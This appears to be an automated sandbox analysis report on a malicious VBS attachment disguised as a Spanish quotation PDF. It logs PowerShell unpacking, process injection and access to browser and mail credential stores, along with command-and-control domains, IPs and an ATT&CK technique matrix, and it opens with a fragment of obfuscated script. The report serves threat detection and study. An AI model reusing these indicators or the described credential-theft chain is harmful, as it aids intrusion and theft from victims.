jusgmidde');$siwash=rundingers 'prv,$v,ssazooJump to behavior
              Source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2574063061.0000000001281000.00000002.00000001.00040000.00000000.sdmp, mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000000.2157448840.0000000001281000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
              Source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2574063061.0000000001281000.00000002.00000001.00040000.00000000.sdmp, mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000000.2157448840.0000000001281000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2574063061.0000000001281000.00000002.00000001.00040000.00000000.sdmp, mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000000.2157448840.0000000001281000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2574063061.0000000001281000.00000002.00000001.00040000.00000000.sdmp, mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000000.2157448840.0000000001281000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0000000E.00000002.2574460468.0000000004740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2572546102.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2573699435.0000000000DF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2574018901.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2249260744.0000000021BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2248575840.000000001F830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2573960761.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0000000E.00000002.2574460468.0000000004740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2572546102.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2573699435.0000000000DF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2574018901.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2249260744.0000000021BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2248575840.000000001F830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2573960761.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              321
              Scripting
              1
              Abuse Elevation Control Mechanism
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              2
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Abuse Elevation Control Mechanism
              LSASS Memory114
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter
              Logon Script (Windows)512
              Process Injection
              4
              Obfuscated Files or Information
              Security Account Manager121
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook1
              Software Packing
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture4
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets31
              Virtualization/Sandbox Evasion
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion
              DCSync1
              Remote System Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job512
              Process Injection
              Proc Filesystem1
              System Network Configuration Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634239 Sample: SOLICITUD DE COTIZACI#U00d3... Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 42 www.natividade.tech 2->42 44 www.matrixfitness.org 2->44 46 4 other IPs or domains 2->46 56 Suricata IDS alerts for network traffic 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 7 other signatures 2->62 10 powershell.exe 15 2->10         started        13 wscript.exe 1 2->13         started        signatures3 process4 signatures5 72 Early bird code injection technique detected 10->72 74 Writes to foreign memory regions 10->74 76 Found suspicious powershell code related to unpacking or dynamic code loading 10->76 78 Queues an APC in another process (thread injection) 10->78 15 msiexec.exe 6 10->15         started        18 conhost.exe 10->18         started        80 VBScript performs obfuscated calls to suspicious functions 13->80 82 Suspicious powershell command line found 13->82 84 Wscript starts Powershell (via cmd or directly) 13->84 86 3 other signatures 13->86 20 powershell.exe 14 20 13->20         started        23 PING.EXE 1 13->23         started        25 BackgroundTransferHost.exe 13 13->25         started        process6 dnsIp7 92 Maps a DLL or memory area into another process 15->92 27 mAV1geIoraZWu3gOV6nu2g.exe 15->27 injected 48 drive.google.com 142.250.185.238, 443, 49708, 49709 GOOGLEUS United States 20->48 50 drive.usercontent.google.com 142.250.74.193, 443, 49710, 63344 GOOGLEUS United States 20->50 94 Found suspicious powershell code related to unpacking or dynamic code loading 20->94 31 conhost.exe 20->31         started        33 conhost.exe 23->33         started        signatures8 process9 dnsIp10 52 natividade.tech 84.32.84.32, 63346, 80 NTT-LT-ASLT Lithuania 27->52 54 www.matrixfitness.org 13.248.169.48, 63345, 80 AMAZON-02US United States 27->54 88 Maps a DLL or memory area into another process 27->88 90 Found direct / indirect Syscall (likely to bypass EDR) 27->90 35 findstr.exe 13 27->35         started        38 poqexec.exe 27->38         started        signatures11 process12 signatures13 64 Tries to steal Mail credentials (via file / registry access) 35->64 66 Tries to harvest and steal browser information (history, passwords, etc) 35->66 68 Modifies the context of a thread in another process (thread injection) 35->68 70 2 other signatures 35->70 40 firefox.exe 35->40         started        process14

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs10%VirustotalBrowse
              SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs13%ReversingLabsWin32.Trojan.Generic
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://www.natividade.tech/3szq/0%Avira URL Cloudsafe
              http://www.natividade.tech0%Avira URL Cloudsafe
              http://www.matrixfitness.org/mkxv/?eXOHnd=MK0ShD/VOT+mjwSUg6UXWJ1xunIFd6dhUarXaHeYlCN0x3qiLyvXgNTQnyE27cakbqtkm7ZzmuQjHRMwfybJi7SxDTb33uf+ERS6QnBR50iPxsPA5QvreV2HDmZaobDhzQ==&ina=lZLpQfth0%Avira URL Cloudsafe
              <
              NameIPActiveMaliciousAntivirus DetectionReputation
              natividade.tech
              84.32.84.32
              truetrue
                unknown
                drive.google.com
                142.250.185.238
                truefalse
                  high
                  drive.usercontent.google.com
                  142.250.74.193
                  truefalse
                    high
                    www.matrixfitness.org
                    13.248.169.48
                    truetrue
                      unknown
                      Host_6637.6637.6637.657e
                      unknown
                      unknownfalse
                        high
                        www.natividade.tech
                        unknown
                        unknowntrue
                          unknown